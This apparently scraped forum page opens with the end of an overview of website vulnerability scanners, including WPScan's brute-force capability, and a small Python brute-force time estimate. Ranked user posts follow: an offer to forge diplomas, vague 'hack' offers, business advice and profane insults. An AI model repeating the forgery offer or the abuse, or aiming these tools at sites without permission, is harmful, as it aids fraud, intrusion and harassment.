- Can find configuration flaws and problems with admin settings;
- Lists Joomla versions and their known vulnerabilities, and likewise for individual components;
- Contains more than 1000 exploits for Joomla components;
- Outputs final reports in text and HTML formats.

WPScan

WPScan is a tool for scanning WordPress sites; its arsenal covers vulnerabilities in the WordPress engine itself as well as in some plugins.

Pros:
- Can enumerate not only insecure WordPress plugins and themes, but also users and TimThumb files;
- Can run brute-force attacks against WordPress sites.

Cons:
- Without the appropriate settings it runs an incomplete set of checks, which can be misleading.

In general, different people prefer different tools: each is good in its own way, and what suits one person may not suit another. If you think we have unfairly overlooked some good utility, tell us about it in the comments!
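The brute-force time calculator mentioned for Weakpass comes down to simple arithmetic: keyspace size divided by cracking speed. A rough sketch (the 10 GH/s hash rate is an assumed figure, in the ballpark of a single modern GPU hashing MD5; real rates depend heavily on the hash algorithm and hardware):

```python
# Rough worst-case estimate of exhaustive brute-force time, in the spirit
# of the Weakpass calculator. hashes_per_second is an assumed benchmark figure.
def brute_force_seconds(charset_size: int, length: int, hashes_per_second: float) -> float:
    """Time to try every password of the given length over the given charset."""
    return charset_size ** length / hashes_per_second

# Example: 8-character lowercase passwords (26 letters) at an assumed 10 GH/s.
secs = brute_force_seconds(26, 8, 10e9)
print(f"{secs:.1f} seconds")  # prints "20.9 seconds"
```

This also shows why targeted dictionaries matter: a curated wordlist of a few million entries finishes in a fraction of a second at the same speed, while exhaustive search grows exponentially with password length.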
Author: @forkyforky
  35. 1 point
    Tell me, my boss, where you want to graduate from, you little prick, and I'll make you whatever diploma your little soul desires.
  36. 1 point
    You can find it here. Each refresh gives you a different hack.
  37. 1 point
    Contact me bro, I have good software and it's free to use!!
  38. 1 point
    OK, it's pretty rare to see people around here accept criticism and treat it as something constructive, so well done, good start. I didn't want to waste my time at first, but now maybe something will stick. Advice (take it with a grain of salt; I'm not an expert in the field, but I've been through some similar processes):

    1. Remove the hyperlink to your site from this thread; it doesn't put you in a positive light. Someone who wants to see who they're dealing with before spending a penny and looks you up on Google will see that you're in the same situation as the people you want to help, yet you can't even help yourself. Blind leading the blind, if you catch my drift. Say you're a small company that wants to "maximize your revenue through technical solutions," as you put it above, including the "online marketing" and "development plan" you mention on your site: those are exactly what you're lacking right now, and your plan was to spam people for lack of better ideas. If another small company pays you to promote them, what do you do? Start spamming others on their behalf? Anyway, leaving aside the irony of your situation, back to something more constructive:

    2. From the first seconds someone comes into contact with you/your site (we can't speak of a "brand" yet), you have to highlight what makes you different (in a good way) from the thousands of other self-proclaimed experts, why it's worth their time to listen to you at all (time is money), and then why they should give you money. In other words, what is your USP (Unique Selling Point)? Then the client should quickly understand how you can use that USP to help them. The site is very generic and "cold"; it isn't clear, exactly and concretely, what you offer, how, and how it helps potential clients.

    3. Know your competition, do your homework. Look at who you'd be competing with in your niche. See what they do well (in terms of their site and how they promote themselves) and try to adapt it (not copy it) to your context. See what they're missing (put yourself in a potential client's shoes) and what you don't like, what would convince you to become their client, etc., and act accordingly in your own business. Also run a small test with friends, relatives, family, etc.: ask them to imagine they're small entrepreneurs, give them the context of your ideal client, and then have them give you an honest view of whether they'd use your services or someone else's, what would convince them to come to you, and so on.

    4. Know the environment you operate in, namely Romania: in this culture, under these circumstances, things still run very much on recommendations, on the good word of your first clients. In other countries people check rating sites, or the old yelp/yellow pages, etc. At the start you need to build a strong base of support, both financially and in terms of testimonials. Besides the relationships you have to develop, the site must explain concretely what you've done, in a way even the dumbest visitor can understand. Putting up things like "David, Constanța", "Mariana, Pitesti", "Carmen, Ilfov" is worth jack shit; it has zero credibility, since anyone can write sentences like that and add unlimited names and locations. If you look at professional sites, they have "case studies". These should be kept concise and follow the STAR method (Situation, Task, Action, Result). That is: what problems the client had that made them come to you (this way potential clients identify with, and see themselves in the shoes of, those who hired you). Then what they asked you to do (subconsciously, this shows they can trust you with x, y, z). How you acted (here's your chance to show how creative you are, etc.), and then the result (this is the final "selling" point, where you convince some farmer up the hill that they too can get the same result, or better, if they use your services). In the past, companies have offered me considerable discounts in exchange for case studies or testimonials like these. They can be something graphical and concise in a PDF, a very short clip, or a combination, etc., depending on the need.

    5. Get up to speed with all the efficient methods (in terms of time, cost, etc., including their weaknesses) of delivering what you want to offer. I don't want to repeat point 1 above, but you have to know your trade if you want to survive. It's a continuous process, you'll never know enough, but every client must see that you know your field. Clueless people survive only off fools who don't know better. Don't get me wrong, you can make good money off fools too (e.g. https://www.fiverr.com/gabonne), but I assume you don't want to focus on that "niche". You say you offer IT support, online marketing, brand identity, application development, and development plans; in my view, you get there over time, once you have at least 50 employees. If, say, a small double-glazing company comes to you and wants the whole range, what do you do: waste their time and money, or turn them down because you have no clue? For example, if besides a company intranet they want daily backups, a bespoke CRM application, payments, suppliers, etc., plus an online development plan and so on, you need the capability to deliver what you say you deliver. And these days, to keep you as a supplier, people also expect advice (mini-consultancy) to come with the product, to see that you care about them. For example, you tell them: look, we can do it your way (a full daily backup, say), but you can also do incremental backups (faster, more cost-efficient, etc.). In fields like this you also become a kind of consultant, and if you have no idea what you're talking about, you just waste their time and money and then get shown the door. Focus on something you know very well and then you can grow organically. You can build partnerships with others who are good in other areas; the better you collaborate, the better you come out. That's about it for now regarding the site and yourself... when/if I'm in the mood, I'll also write something about promotion ideas.
  39. 1 point
    :))))))) we're so screwed.
  40. 1 point
  41. 1 point
    Something new: hackyard. Something ethical: hackpedia. Something good: RST. Compare them yourselves. That's what I liked here, the blackhat side. You learn a lot more that way than on the ethical side. Freedom. The password part sounds good; I'll see what we can do in the coming days, not everything is ready yet. And I have more ideas.
  42. 0 points
    I want to close my account on Romanian Security Team, how do I go about it?
  43. 0 points
    Whoever you are, we'll smack you around; get to work, fuck you, you antisocial prick. You all sit around on your parents' money all day and want everything for free.
  44. 0 points
    I recommend xda, as QKQL said; look for a tutorial with positive reviews, because if you do the root wrong you might spend 2-3-4 days undoing it ^^
  45. -1 points
    SEO, Benone, are you still breathing? There's a blog category around here.
  46. -2 points
    It's easy to swear at people on the internet, huh? What do you do? Do you have the guts to say the same thing to my face in real life? What do I want? Did I ask for free hosting or anything like that? Get to work? Just because you swing a hoe in a field or fiddle with cables doesn't mean we all want to do squat with our lives (but stay chill, somebody has to do the grunt work too; anyway, I prefer to use my brain as well. You can stick to the hoe or whatever the hell you do). Antisocial? Hey, "social" one, you frustrated clown, you've been wasting time and insulting people on the internet since 2013. I swear, you're so "interesting". Oh... and I'm living on my parents' money? Is that why I spent the summer working as an assistant cook? "Because I live on my parents' money." Oh yes... and a small edit: before you tell me (with no proof whatsoever, of course) that you work God knows where and make umpteen thousand euros, I want you to know I don't care. Go take it out on your mom and dad, not on the forum, if you're frustrated because of that job where you make who knows how many golden dicks but your boss still isn't satisfied and screams at you worse than Hitler.
  47. -2 points
  48. -2 points
    If anyone could give me a FileList invite code too, please.